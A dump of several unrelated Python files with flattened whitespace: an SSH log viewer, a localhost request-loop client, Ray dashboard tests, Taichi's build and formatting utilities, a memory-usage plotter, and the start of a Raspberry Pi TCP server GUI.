def _connect_ssh(self, host, nodename, user=None, pw=None): try: if user is not None: self.infoLabel.setText('connecting to %s@%s' % (user, host)) else: self.infoLabel.setText('connecting to %s' % host) ok = False self._ssh_input_file, self._ssh_output_file, self._ssh_error_file, ok = nm.ssh().ssh_exec(host, [nm.settings().start_remote_script, '--tail_screen_log', nodename], user, pw, auto_pw_request=False, get_pty=True) if ok: thread = threading.Thread(target=self._read_ssh_output, args=((self._ssh_output_file,))) thread.setDaemon(True) thread.start() thread = threading.Thread(target=self._read_ssh_error, args=((self._ssh_error_file,))) thread.setDaemon(True) thread.start() elif self._ssh_output_file: self._ssh_output_file.close() self._ssh_error_file.close() except nm.AuthenticationRequest as e: self.auth_signal.emit(host, nodename, user) except Exception as e: self.error_signal.emit('%s\n' % e) def on_request_pw(self, host, nodename, user): res, user, pw = nm.ssh()._requestPW(user, host) if res: self._connect_ssh(host, nodename, user, pw) def _read_ssh_output(self, output_file): while not output_file.closed: text = output_file.readline() if text: self.output.emit(text.rstrip() + '\n') def _read_ssh_error(self, error_file): try: while not error_file.closed: text = error_file.readline() if text: self.error_signal.emit(text.rstrip() + '\n') except Exception: pass def on_toggle_loggers(self, state): self.logframe.setVisible(state) if state: self.logger_handler.update() def on_logger_filter_changed(self, text): ''' Filter the displayed loggers ''' if self.logger_handler is not None: self.logger_handler.filter(text)
client2.py
import socket import time from threading import Thread def make_request(): start_time = time.time() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('localhost', 8000)) sock.send(b'GET /\n\n') resp = sock.recv(100) sock.close() end_time = time.time() print(time.strftime("%H:%M:%S"), end_time-start_time) from threading import Thread def do_request_forever(): while True: make_request() t1 = Thread(target=do_request_forever) t2 = Thread(target=do_request_forever) t1.start() t2.start()
test_node.py
import os import sys import logging import requests import time import traceback import random import pytest import ray import threading from datetime import datetime, timedelta from ray.cluster_utils import Cluster from ray.new_dashboard.tests.conftest import * # noqa from ray._private.test_utils import ( format_web_url, wait_until_server_available, wait_for_condition, wait_until_succeeded_without_exception) logger = logging.getLogger(__name__) def test_nodes_update(enable_test_module, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]) is True) webui_url = ray_start_with_dashboard["webui_url"] webui_url = format_web_url(webui_url) timeout_seconds = 10 start_time = time.time() while True: time.sleep(1) try: response = requests.get(webui_url + "/test/dump") response.raise_for_status() try: dump_info = response.json() except Exception as ex: logger.info("failed response: %s", response.text) raise ex assert dump_info["result"] is True dump_data = dump_info["data"] assert len(dump_data["nodes"]) == 1 assert len(dump_data["agents"]) == 1 assert len(dump_data["nodeIdToIp"]) == 1 assert len(dump_data["nodeIdToHostname"]) == 1 assert dump_data["nodes"].keys() == dump_data[ "nodeIdToHostname"].keys() response = requests.get(webui_url + "/test/notified_agents") response.raise_for_status() try: notified_agents = response.json() except Exception as ex: logger.info("failed response: %s", response.text) raise ex assert notified_agents["result"] is True notified_agents = notified_agents["data"] assert len(notified_agents) == 1 assert notified_agents == dump_data["agents"] break except (AssertionError, requests.exceptions.ConnectionError) as e: logger.info("Retry because of %s", e) finally: if time.time() > start_time + timeout_seconds: raise Exception("Timed out while testing.") def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard): @ray.remote class Actor: def getpid(self): return os.getpid() actors = [Actor.remote(), Actor.remote()] actor_pids = [actor.getpid.remote() for actor in actors] actor_pids = set(ray.get(actor_pids)) assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]) is True) webui_url = ray_start_with_dashboard["webui_url"] webui_url = format_web_url(webui_url) node_id = ray_start_with_dashboard["node_id"] timeout_seconds = 10 start_time = time.time() last_ex = None while True: time.sleep(1) try: response = requests.get(webui_url + "/nodes?view=hostnamelist") response.raise_for_status() hostname_list = response.json() assert hostname_list["result"] is True, hostname_list["msg"] hostname_list = hostname_list["data"]["hostNameList"] assert len(hostname_list) == 1 hostname = hostname_list[0] response = requests.get(webui_url + f"/nodes/{node_id}") response.raise_for_status() detail = response.json() assert detail["result"] is True, detail["msg"] detail = detail["data"]["detail"] assert detail["hostname"] == hostname assert detail["raylet"]["state"] == "ALIVE" assert "raylet" in detail["cmdline"][0] assert len(detail["workers"]) >= 2 assert len(detail["actors"]) == 2, detail["actors"] assert len(detail["raylet"]["viewData"]) > 0 actor_worker_pids = set() for worker in detail["workers"]: if "ray::Actor" in worker["cmdline"][0]: actor_worker_pids.add(worker["pid"]) assert actor_worker_pids == actor_pids response = requests.get(webui_url + "/nodes?view=summary") response.raise_for_status() summary = response.json() assert summary["result"] is True, summary["msg"] assert len(summary["data"]["summary"]) == 1 summary = summary["data"]["summary"][0] assert summary["hostname"] == hostname assert summary["raylet"]["state"] == "ALIVE" assert "raylet" in summary["cmdline"][0] assert "workers" not in summary assert "actors" not in summary assert "viewData" not in summary["raylet"] assert "objectStoreAvailableMemory" in summary["raylet"] assert "objectStoreUsedMemory" in summary["raylet"] break except Exception as ex: last_ex = ex finally: if time.time() > start_time + timeout_seconds: ex_stack = traceback.format_exception( type(last_ex), last_ex, last_ex.__traceback__) if last_ex else [] ex_stack = "".join(ex_stack) raise Exception(f"Timed out while testing, {ex_stack}") def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])) @ray.remote class ActorWithObjs: def __init__(self): self.obj_ref = ray.put([1, 2, 3]) def get_obj(self): return ray.get(self.obj_ref) my_obj = ray.put([1, 2, 3] * 100) # noqa actors = [ActorWithObjs.remote() for _ in range(2)] # noqa results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa webui_url = format_web_url(ray_start_with_dashboard["webui_url"]) resp = requests.get( webui_url + "/memory/set_fetch", params={"shouldFetch": "true"}) resp.raise_for_status() def check_mem_table(): resp = requests.get(f"{webui_url}/memory/memory_table") resp_data = resp.json() assert resp_data["result"] latest_memory_table = resp_data["data"]["memoryTable"] summary = latest_memory_table["summary"] # 1 ref per handle and per object the actor has a ref to assert summary["totalActorHandles"] == len(actors) * 2 # 1 ref for my_obj assert summary["totalLocalRefCount"] == 1 wait_until_succeeded_without_exception( check_mem_table, (AssertionError, ), timeout_ms=1000) def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard): assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])) webui_url = format_web_url(ray_start_with_dashboard["webui_url"]) @ray.remote class ActorWithObjs: def __init__(self): print("I also log a line") self.obj_ref = ray.put([1, 2, 3]) def get_obj(self): return ray.get(self.obj_ref) actors = [ActorWithObjs.remote() for _ in range(2)] # noqa timeout_seconds = 20 start_time = time.time() last_ex = None def check_node_details(): resp = requests.get(f"{webui_url}/nodes?view=details") resp_json = resp.json() resp_data = resp_json["data"] clients = resp_data["clients"] node = clients[0] assert len(clients) == 1 assert len(node.get("actors")) == 2 # Workers information should be in the detailed payload assert "workers" in node assert "logCount" in node # Two lines printed by ActorWithObjs # One line printed by autoscaler: monitor.py:118 -- Monitor: Started assert node["logCount"] > 2 print(node["workers"]) assert len(node["workers"]) == 2 assert node["workers"][0]["logCount"] == 1 while True: time.sleep(1) try: check_node_details() break except (AssertionError, KeyError, IndexError) as ex: last_ex = ex finally: if time.time() > start_time + timeout_seconds: ex_stack = traceback.format_exception( type(last_ex), last_ex, last_ex.__traceback__) if last_ex else [] ex_stack = "".join(ex_stack) raise Exception(f"Timed out while testing, {ex_stack}") @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster: Cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) cluster.add_node() cluster.add_node() def _check_nodes(): try: response = requests.get(webui_url + "/nodes?view=summary") response.raise_for_status() summary = response.json() assert summary["result"] is True, summary["msg"] summary = summary["data"]["summary"] assert len(summary) == 3 for node_info in summary: node_id = node_info["raylet"]["nodeId"] response = requests.get(webui_url + f"/nodes/{node_id}") response.raise_for_status() detail = response.json() assert detail["result"] is True, detail["msg"] detail = detail["data"]["detail"] assert detail["raylet"]["state"] == "ALIVE" response = requests.get(webui_url + "/test/dump?key=agents") response.raise_for_status() agents = response.json() assert len(agents["data"]["agents"]) == 3 return True except Exception as ex: logger.info(ex) return False wait_for_condition(_check_nodes, timeout=15) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_multi_node_churn(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster: Cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = format_web_url(cluster.webui_url) def cluster_chaos_monkey(): worker_nodes = [] while True: time.sleep(5) if len(worker_nodes) < 2: worker_nodes.append(cluster.add_node()) continue should_add_node = random.randint(0, 1) if should_add_node: worker_nodes.append(cluster.add_node()) else: node_index = random.randrange(0, len(worker_nodes)) node_to_remove = worker_nodes.pop(node_index) cluster.remove_node(node_to_remove) def get_index(): resp = requests.get(webui_url) resp.raise_for_status() def get_nodes(): resp = requests.get(webui_url + "/nodes?view=summary") resp.raise_for_status() summary = resp.json() assert summary["result"] is True, summary["msg"] assert summary["data"]["summary"] t = threading.Thread(target=cluster_chaos_monkey, daemon=True) t.start() t_st = datetime.now() duration = timedelta(seconds=60) while datetime.now() < t_st + duration: get_index() time.sleep(2) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_logs(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) nodes = ray.nodes() assert len(nodes) == 1 node_ip = nodes[0]["NodeManagerAddress"] @ray.remote class LoggingActor: def go(self, n): i = 0 while i < n: print(f"On number {i}") i += 1 def get_pid(self): return os.getpid() la = LoggingActor.remote() la2 = LoggingActor.remote() la_pid = str(ray.get(la.get_pid.remote())) la2_pid = str(ray.get(la2.get_pid.remote())) ray.get(la.go.remote(4)) ray.get(la2.go.remote(1)) def check_logs(): node_logs_response = requests.get( f"{webui_url}/node_logs", params={"ip": node_ip}) node_logs_response.raise_for_status() node_logs = node_logs_response.json() assert node_logs["result"] assert type(node_logs["data"]["logs"]) is dict assert all( pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid)) assert len(node_logs["data"]["logs"][la2_pid]) == 1 actor_one_logs_response = requests.get( f"{webui_url}/node_logs", params={ "ip": node_ip, "pid": str(la_pid) }) actor_one_logs_response.raise_for_status() actor_one_logs = actor_one_logs_response.json() assert actor_one_logs["result"] assert type(actor_one_logs["data"]["logs"]) is dict assert len(actor_one_logs["data"]["logs"][la_pid]) == 4 wait_until_succeeded_without_exception( check_logs, (AssertionError), timeout_ms=1000) @pytest.mark.parametrize( "ray_start_cluster_head", [{ "include_dashboard": True }], indirect=True) def test_errors(enable_test_module, disable_aiohttp_cache, ray_start_cluster_head): cluster = ray_start_cluster_head assert (wait_until_server_available(cluster.webui_url) is True) webui_url = cluster.webui_url webui_url = format_web_url(webui_url) nodes = ray.nodes() assert len(nodes) == 1 node_ip = nodes[0]["NodeManagerAddress"] @ray.remote class ErrorActor(): def go(self): raise ValueError("This is an error") def get_pid(self): return os.getpid() ea = ErrorActor.remote() ea_pid = ea.get_pid.remote() ea.go.remote() def check_errs(): node_errs_response = requests.get( f"{webui_url}/node_logs", params={"ip": node_ip}) node_errs_response.raise_for_status() node_errs = node_errs_response.json() assert node_errs["result"] assert type(node_errs["data"]["errors"]) is dict assert ea_pid in node_errs["data"]["errors"] assert len(node_errs["data"]["errors"][ea_pid]) == 1 actor_err_response = requests.get( f"{webui_url}/node_logs", params={ "ip": node_ip, "pid": str(ea_pid) }) actor_err_response.raise_for_status() actor_errs = actor_err_response.json() assert actor_errs["result"] assert type(actor_errs["data"]["errors"]) is dict assert len(actor_errs["data"]["errors"][ea_pid]) == 4 wait_until_succeeded_without_exception( check_errs, (AssertionError), timeout_ms=1000) if __name__ == "__main__": sys.exit(pytest.main(["-v", __file__]))
util.py
import os import re import shutil import sys import ctypes from pathlib import Path from colorama import Fore, Back, Style from taichi.misc.settings import get_output_directory, get_build_directory, get_bin_directory, get_repo_directory, get_runtime_directory from taichi.misc.util import get_os_name, get_unique_task_id if sys.version_info[0] < 3 or sys.version_info[1] <= 5: print("\nPlease restart with Python 3.6+\n") print("Current Python version:", sys.version_info) exit(-1) ti_core = None def in_docker(): if os.environ.get("TI_IN_DOCKER", "") == "": return False else: return True def import_ti_core(tmp_dir=None): global ti_core if get_os_name() != 'win': old_flags = sys.getdlopenflags() sys.setdlopenflags(258) # 258 = RTLD_NOW | RTLD_GLOBAL else: pyddir = os.path.join(package_root(), 'lib') os.environ['PATH'] += ';' + pyddir try: import taichi_core as core except Exception as e: if isinstance(e, ImportError): print( "Share object taichi_core import failed. If you are on Windows, please consider installing \"Microsoft Visual C++ Redistributable\" (https://aka.ms/vs/16/release/vc_redist.x64.exe)" ) raise e ti_core = core if get_os_name() != 'win': sys.setdlopenflags(old_flags) lib_dir = os.path.join(package_root(), 'lib') core.set_lib_dir(locale_encode(lib_dir)) if tmp_dir is not None: core.set_tmp_dir(locale_encode(tmp_dir)) def locale_encode(s): try: import locale encoding = locale.getdefaultlocale()[1] except: encoding = 'utf8' return s.encode(encoding) def is_ci(): return os.environ.get('TI_CI', '') == '1' def package_root(): return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../') def is_release(): return os.environ.get('TAICHI_REPO_DIR', '') == '' def get_core_shared_object(): if is_release(): directory = os.path.join(package_root(), 'lib') else: directory = get_bin_directory() return os.path.join(directory, 'libtaichi_core.so') def get_repo(): from git import Repo repo = Repo(get_repo_directory()) return repo def print_red_bold(*args, **kwargs): print(Fore.RED + Style.BRIGHT, end='') print(*args, **kwargs) print(Style.RESET_ALL, end='') def has_suffix(f, suffixes): for suf in suffixes: if f.endswith('.' + suf): return True return False def format_plain_text(fn): formatted = '' with open(fn, 'r') as f: for l in f: l = l.rstrip() if l.find('\t') != -1: print(f'Warning: found tab in {fn}. Skipping...') return formatted += l + '\n' while len(formatted) and formatted[-1] == '\n': formatted = formatted[:-1] formatted += '\n' with open(fn, 'w') as f: f.write(formatted) def _find_clang_format_bin(): candidates = ['clang-format-6.0', 'clang-format'] result = None import subprocess as sp for c in candidates: try: if sp.run([c, '--version'], stdout=sp.DEVNULL, stderr=sp.DEVNULL).returncode == 0: result = c break except: pass import colorama colorama.init() if result is None: print(Fore.YELLOW + 'Did not find any clang-format executable, skipping C++ files', file=sys.stderr) else: print('C++ formatter: {}{}'.format(Fore.GREEN, result)) print(Style.RESET_ALL) return result def format(all=False, diff=None): import os import taichi as tc from yapf.yapflib.yapf_api import FormatFile repo = get_repo() if all: directories = [ 'taichi', 'tests', 'examples', 'misc', 'python', 'benchmarks', 'docs', 'misc' ] files = [] for d in directories: files += list( Path(os.path.join(tc.get_repo_directory(), d)).rglob('*')) else: if diff is None: def find_diff_or_empty(s): try: return repo.index.diff(s) except: return [] # TODO(#628): Have a way to customize the repo names, in order to # support noncanonical namings. # # Finds all modified files from upstream/master to working tree # 1. diffs between the index and upstream/master. Also inclulde # origin/master for repo owners. files = find_diff_or_empty('upstream/master') files += find_diff_or_empty('origin/master') # 2. diffs between the index and the working tree # https://gitpython.readthedocs.io/en/stable/tutorial.html#obtaining-diff-information files += repo.index.diff(None) else: files = repo.index.diff(diff) files = list( map(lambda x: os.path.join(tc.get_repo_directory(), x.a_path), files)) files = sorted(set(map(str, files))) clang_format_bin = _find_clang_format_bin() print('Code formatting ...') for fn in files: if not os.path.exists(fn): continue if os.path.isdir(fn): continue if fn.find('.pytest_cache') != -1: continue if fn.find('docs/build/') != -1: continue if re.match(r'.*examples\/[a-z_]+\d\d+\.py$', fn): print(f'Skipping example file {fn}...') continue if fn.endswith('.py'): print('Formatting "{}"'.format(fn)) FormatFile(fn, in_place=True, style_config=os.path.join(tc.get_repo_directory(), 'misc', '.style.yapf')) elif clang_format_bin and has_suffix(fn, ['cpp', 'h', 'cu', 'cuh']): print('Formatting "{}"'.format(fn)) os.system('{} -i -style=file {}'.format(clang_format_bin, fn)) elif has_suffix(fn, ['txt', 'md', 'rst', 'cfg', 'll', 'ptx']): print('Formatting "{}"'.format(fn)) format_plain_text(fn) elif has_suffix(fn, [ 'pyc', 'png', 'jpg', 'bmp', 'gif', 'gitignore', 'whl', 'mp4', 'html' ]): pass else: print(f'Skipping {fn}...') print('Formatting done!') create_sand_box_on_windows = True def build(): tmp_cwd = os.getcwd() bin_dir = get_build_directory() try: os.mkdir(bin_dir) except: pass os.chdir(bin_dir) import multiprocessing print('Building taichi...') num_make_threads = min(20, multiprocessing.cpu_count()) if get_os_name() == 'win': make_ret = os.system( "msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln") else: make_ret = os.system('make -j {}'.format(num_make_threads)) if make_ret != 0: print(' Error: Build failed.') exit(-1) os.chdir(tmp_cwd) def prepare_sandbox(src): global g_tmp_dir assert os.path.exists(src) import atexit import shutil from tempfile import mkdtemp tmp_dir = mkdtemp(prefix='taichi-') atexit.register(shutil.rmtree, tmp_dir) print(f'[Taichi] preparing sandbox at {tmp_dir}') dest = os.path.join(tmp_dir, 'taichi_core.so') shutil.copy(src, dest) os.mkdir(os.path.join(tmp_dir, 'runtime/')) print(f'[Taichi] sandbox prepared') return tmp_dir if is_release(): print("[Taichi] mode=release") sys.path.append(os.path.join(package_root(), 'lib')) if get_os_name() != 'win': link_src = os.path.join(package_root(), 'lib', 'taichi_core.so') link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so') # For llvm jit to find the runtime symbols if not os.path.exists(link_dst): os.symlink(link_src, link_dst) import_ti_core() if get_os_name() != 'win': dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_GLOBAL) ti_core.set_python_package_dir(package_root()) os.makedirs(ti_core.get_repo_dir(), exist_ok=True) else: print("[Taichi] mode=development") if get_os_name() == 'osx': bin_dir = get_bin_directory() os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory() lib_path = os.path.join(bin_dir, 'libtaichi_core.dylib') tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox(lib_path) os.chdir(tmp_dir) sys.path.append(tmp_dir) import taichi_core as ti_core os.chdir(tmp_cwd) elif get_os_name() == 'linux': bin_dir = get_bin_directory() if 'LD_LIBRARY_PATH' in os.environ: os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/' else: os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/' lib_path = os.path.join(bin_dir, 'libtaichi_core.so') assert os.path.exists(lib_path) tmp_cwd = os.getcwd() tmp_dir = prepare_sandbox(lib_path) os.chdir(tmp_dir) sys.path.append(tmp_dir) try: import_ti_core(tmp_dir) except Exception as e: from colorama import Fore, Back, Style print_red_bold("Taichi core import failed: ", end='') print(e) exit(-1) os.chdir(tmp_cwd) elif get_os_name() == 'win': bin_dir = get_bin_directory() dll_path1 = os.path.join(bin_dir, 'RelWithDebInfo', 'taichi_core.dll') dll_path2 = os.path.join(bin_dir, 'libtaichi_core.dll') assert os.path.exists(dll_path1) and not os.path.exists(dll_path2) # On windows when an dll/pyd is loaded, we can not write to it any more old_wd = os.getcwd() os.chdir(bin_dir) if create_sand_box_on_windows: # Create a sandbox for separated core lib development and loading folder = os.path.join(get_output_directory(), 'tmp', get_unique_task_id()) lib_dir = os.path.join(get_repo_directory(), 'external', 'lib') os.environ['PATH'] += ';' + lib_dir os.makedirs(folder) if os.path.exists(dll_path1): shutil.copy(dll_path1, os.path.join(folder, 'taichi_core.pyd')) else: shutil.copy(dll_path2, os.path.join(folder, 'taichi_core.pyd')) os.environ['PATH'] += ';' + folder sys.path.append(folder) else: shutil.copy(dll_path, os.path.join(bin_dir, 'taichi_core.pyd')) sys.path.append(bin_dir) try: import taichi_core as ti_core except Exception as e: print(e) print() print( 'Hint: please make sure the major and minor versions of the Python executable is correct.' ) print() raise e os.chdir(old_wd) log_level = os.environ.get('TI_LOG_LEVEL', '') if log_level: ti_core.set_logging_level(log_level) def get_dll_name(name): if get_os_name() == 'linux': return 'libtaichi_%s.so' % name elif get_os_name() == 'osx': return 'libtaichi_%s.dylib' % name elif get_os_name() == 'win': return 'taichi_%s.dll' % name else: assert False, "Unknown OS" def load_module(name, verbose=True): if verbose: print('Loading module', name) try: if get_os_name() == 'osx': mode = ctypes.RTLD_LOCAL else: mode = ctypes.RTLD_GLOBAL if '.so' in name: ctypes.PyDLL(name, mode=mode) else: ctypes.PyDLL(os.path.join(get_repo_directory(), 'build', get_dll_name(name)), mode=mode) except Exception as e: print(Fore.YELLOW + "Warning: module [{}] loading failed: {}".format(name, e) + Style.RESET_ALL) def at_startup(): if not is_release(): output_dir = get_output_directory() if not os.path.exists(output_dir): print('Making output directory') os.mkdir(output_dir) ti_core.set_core_state_python_imported(True) def start_memory_monitoring(output_fn, pid=-1, interval=1): # removing dependency on psutil return import os, psutil, time if pid == -1: pid = os.getpid() import multiprocessing def task(): with open(output_fn, 'w') as f: process = psutil.Process(pid) while True: try: mem = process.memory_info().rss except: mem = -1 time.sleep(interval) print(time.time(), mem, file=f) f.flush() proc = multiprocessing.Process(target=task, daemon=True) proc.start() def require_version(major, minor=None, patch=None): versions = [ int(ti_core.get_version_major()), int(ti_core.get_version_minor()), int(ti_core.get_version_patch()), ] match = major == versions[0] and ( minor < versions[1] or minor == versions[1] and patch <= versions[2]) if match: return else: print("Taichi version mismatch. required >= {}.{}.{}".format( major, minor, patch)) print("Installed =", ti_core.get_version_string()) raise Exception("Taichi version mismatch") at_startup() def _print_taichi_header(): dev_mode = not is_release() header = '[Taichi] ' if dev_mode: header += '<dev mode>, ' else: header += f'version {ti_core.get_version_string()}, ' supported_archs = ['cpu'] if ti_core.with_cuda(): supported_archs.append('cuda') if ti_core.with_opengl(): supported_archs.append('opengl') if ti_core.with_metal(): supported_archs.append('metal') if len(supported_archs) == 1: supported_archs[0] = 'cpu only' archs_str = ', '.join(sorted(supported_archs)) header += f'supported archs: [{archs_str}], ' commit_hash = ti_core.get_commit_hash() commit_hash = commit_hash[:8] header += f'commit {commit_hash}, ' py_ver = '.'.join(str(x) for x in sys.version_info[:3]) header += f'python {py_ver}' print(header) _print_taichi_header()
plotter.py
#%% import matplotlib.animation as animation import matplotlib.pyplot as plt import psutil from multiprocessing import Event, \ Process, \ SimpleQueue as SQ, \ set_start_method from threading import Thread from time import sleep from types import SimpleNamespace as SN set_start_method('spawn', force=True) class QueuePair(object): def __init__(self, name, history, padding=0): self.graph = SQ() self.event = SQ() self.name = name self.history = history self.y = SN(graph=[None]*padding, event=[None]*padding) self.anno = [] def _get_graph(self): val = None if not self.graph.empty(): val = self.graph.get() self.y.graph.append(val) self.y.graph = self.y.graph[-self.history:] def _get_event(self, t): val = None # If a message was recieved if not self.event.empty(): val = self.event.get() # Attach it to the last known data event for i in range(1, len(self.y.graph)): if self.y.graph[-i] is not None: self.anno.append([t, self.y.graph[-i], str(val)]) val = self.y.graph[-i] break else: print(f'Could not attach annotation {val} to a value on the graph, dropping annotation') val = None self.y.event.append(val) self.y.event = self.y.event[-self.history:] def get(self, t): self._get_graph() self._get_event(t) return class Plotter(object): def __init__(self, refresh=1, history=60, style='fivethirtyeight', save_to=None): self.queues = {} self.refresh = refresh self.history = int(history / refresh) self.time = 0 self.x = [] #self.wait = Event() self.save_wait = Event() self.save_wait.clear() self.save_to = save_to # Instantiate the plot self.style = style self.fig = plt.figure() plt.ion() def get_queues(self, name): if name in self.queues: return self.queues[name] self.queues[name] = QueuePair(name=name, history=self.history) return self.queues[name] def start(self): #self.wait.set() #self.proc = Process(target=self.__run__) #self.proc.start() proc = Process(target=self._run) proc.start() self.proc = psutil.Process(proc.pid) return True def stop(self): self.save_wait.set() sleep(.1) self.save_wait.wait() self.proc.terminate() return True def _run(self): # TODO: look into blit support self.anim = animation.FuncAnimation(self.fig, self.animation, interval=self.refresh*1000, cache_frame_data=False) plt.style.use(self.style) if self.save_to: self.save_wait.wait() self.save_wait.clear() self.anim.save(self.save_to) self.save_wait.set() else: plt.show() ''' while True: if not self.wait.is_set(): print('PAUSING') self.anim.event_source.stop() self.wait.wait() print('RESUMING') self.anim.event_source.start() sleep(self.refresh) ''' def pause(self): self.proc.suspend() #self.wait.clear() return self.anim.event_source.stop() def resume(self): self.proc.resume() #self.wait.set() return self.anim.event_source.start() def animation(self, i): self.time += self.refresh self.x.append(self.time) self.x = self.x[-self.history:] plt.clf() for name, pair in self.queues.items(): pair.get(self.time) plt.plot(self.x, pair.y.graph, label=pair.name) plt.plot(self.x, pair.y.event, 'o') for anno in pair.anno: x, y, note = anno plt.annotate(note, xy=(x, y)) plt.title('Memory Usage over Time') plt.ylabel('GB') plt.xlabel(f'Time ({self.refresh}s)') plt.gca().spines['top'].set_visible(False) plt.gca().spines['right'].set_visible(False) plt.legend(loc='upper left') """# NOT IMPLEMENTED def dec_watch(func, name=None, enable=[], pArgs={}, wArgs={}, queues=[]): ''' queues = ['name', 'name', ...] return queues for those names into the target func ''' def wrap(*args, **kwargs): return func(*args, **kwargs, pltt=ret) pltt = Plotter(**pArgs) ret = {'pltt': pltt} ret[name or func.__name__] = {'pid': psutil.os.getpid(), 'queues': pltt.get_queues(name or func.__name__)} for resv in enable: if resv in ['total']: watch[resv] = {resv: {}, pltt.get_queues(resv)} watcher(watch=ret, **wArgs) return wrap """ def watcher(*args, **kwargs): th = Thread(target=_watch, args=args, kwargs=kwargs, daemon=True) th.daemon = True th.start() def _watch(watch, refresh=1, measure=1e9, limit=10, **kwargs): ''' Procs is a dict in the format: {name: {pid: ..., queue: ...}, ...} ''' print('Initializing watcher') resvd = ['total'] # Separate reserved processes from nonreserved procs = [SN(name=name, **attrs) for name, attrs in watch.items() if name not in resvd] resvs = [SN(name=name, **attrs) for name, attrs in watch.items() if name in resvd] # Initialize the psutil process objects and expected variables for proc in procs: proc.ps = psutil.Process(proc.pid) proc.mem = 0 proc.max = 0 for resv in resvs: resv.mem = 0 resv.max = 0 try: alive = True while alive: alive = False for proc in procs: if not proc.ps.is_running() or proc.ps.status() == psutil.STATUS_ZOMBIE: proc.mem = 0 continue alive = True proc.mem = proc.ps.memory_info().rss / measure proc.max = max(proc.max, proc.mem) proc.queue.put(proc.mem) for resv in resvs: if resv.name == 'total': resv.mem = sum([proc.mem for proc in procs]) resv.max = max(resv.max, resv.mem) resv.queue.put(resv.mem) sleep(refresh) except: pass print('Closing watcher') def __watch(watch, refresh=1, measure=1e9, limit=10, timeout=30): print('Initializing watcher') resvd = ['total'] # Separate reserved processes from nonreserved procs = [SN(name=name, **attrs) for name, attrs in watch.items() if name not in resvd] resvs = [SN(name=name, **attrs) for name, attrs in watch.items() if name in resvd] # Initialize the psutil process objects and expected variables for proc in procs: proc.ps = psutil.Process(proc.pid) proc.mem = 0 proc.max = 0 for resv in resvs: resv.mem = 0 resv.max = 0 health = timeout change = False while health: for proc in procs: if not proc.ps.is_running() or proc.ps.status() == psutil.STATUS_ZOMBIE: proc.mem = 0 continue proc.prv = proc.mem proc.mem = proc.ps.memory_info().rss / measure proc.max = max(proc.max, proc.mem) proc.queue.put(proc.mem) # If the previous memory is different than the current if proc.prv != proc.mem: change = True for resv in resvs: if resv.name == 'total': resv.mem = sum([proc.mem for proc in procs]) resv.max = max(resv.max, resv.mem) resv.queue.put(resv.mem) sleep(refresh) # If change did occurred, reset health, else decrement if change: change = False health = timeout else: health -= 1
main.py
import io import os import socket import struct import time import picamera import sys,getopt from Thread import * from threading import Thread from server import Server from server_ui import Ui_server_ui from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtCore import * from PyQt5.QtWidgets import * from PyQt5.QtGui import * class mywindow(QMainWindow,Ui_server_ui): def __init__(self): self.user_ui=True self.start_tcp=False self.TCP_Server=Server() self.parseOpt() if self.user_ui: self.app = QApplication(sys.argv) super(mywindow,self).__init__() self.setupUi(self) self.m_DragPosition=self.pos() self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint) self.setMouseTracking(True) self.Button_Server.setText("On") self.on_pushButton() self.Button_Server.clicked.connect(self.on_pushButton) self.pushButton_Close.clicked.connect(self.close) self.pushButton_Min.clicked.connect(self.windowMinimumed) if self.start_tcp: self.TCP_Server.StartTcpServer() self.ReadData=Thread(target=self.TCP_Server.readdata) self.SendVideo=Thread(target=self.TCP_Server.sendvideo) self.power=Thread(target=self.TCP_Server.Power) self.SendVideo.start() self.ReadData.start() self.power.start() if self.user_ui: self.label.setText("Server On") self.Button_Server.setText("Off") def windowMinimumed(self): self.showMinimized() def mousePressEvent(self, event): if event.button()==Qt.LeftButton: self.m_drag=True self.m_DragPosition=event.globalPos()-self.pos() event.accept() def mouseMoveEvent(self, QMouseEvent): if QMouseEvent.buttons() and Qt.LeftButton: self.move(QMouseEvent.globalPos()-self.m_DragPosition) QMouseEvent.accept() def mouseReleaseEvent(self, QMouseEvent): self.m_drag=False def parseOpt(self): self.opts,self.args = getopt.getopt(sys.argv[1:],"tn") for o,a in self.opts: if o in ('-t'): print ("Open TCP") self.start_tcp=True elif o in ('-n'): self.user_ui=False def close(self): try: stop_thread(self.SendVideo) stop_thread(self.ReadData) stop_thread(self.power) except: pass try: self.TCP_Server.server_socket.shutdown(2) self.TCP_Server.server_socket1.shutdown(2) self.TCP_Server.StopTcpServer() except: pass print ("Close TCP") if self.user_ui: QCoreApplication.instance().quit() os._exit(0) def on_pushButton(self): if self.label.text()=="Server Off": self.label.setText("Server On") self.Button_Server.setText("Off") self.TCP_Server.tcp_Flag = True print ("Open TCP") self.TCP_Server.StartTcpServer() 